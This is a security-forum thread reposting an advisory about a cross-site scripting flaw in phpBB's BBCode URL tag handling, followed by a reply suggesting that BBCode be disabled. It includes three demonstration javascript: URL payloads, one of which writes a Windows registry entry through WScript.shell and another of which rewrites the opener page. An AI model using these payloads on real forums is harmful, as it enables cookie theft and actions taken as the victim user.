Waraxe IT Security Portal

LINUX · Moderator

Diablo reported a vulnerability in phpBB in the processing of BBCode URL tags. A remote user can conduct cross-site scripting attacks.

A remote user can submit specially crafted BBCode URL tags that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the phpBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

[url=javascript://%0ASh=alert(%22CouCou%22);
window.close();]Alert box with \"Exploit By Diablo #asc #uruguay\"[/url]

[url=javascript://%0ASh=new%20ActiveXObject
(%22WScript.shell%22);Sh.regwrite(%22HKCU
%5C%5CQQQQQ%5C%5Cqq%22,%22Ex ploit By Diablo #asc #uruguay
%22);window.close();]Create registry entry:
HKCU\\QQQQQ\\qq = \"CouCou\"[/url]

[url=javascript://%0Awindow.opener.document.body.
inner HTML=window.opener.document.body.innerHTML.
replace(%27Hacked%20By%27,%27Diablo%2#asc#uruguai%27);
window.close();]Modify opener page: Diablo -> irc.gigachat.net #asc #uruguay[/url]

Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the phpBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

y3dips · Valuable expert

just disabling your BBCODE Smile

even the forum wont look so nice, but i think it helps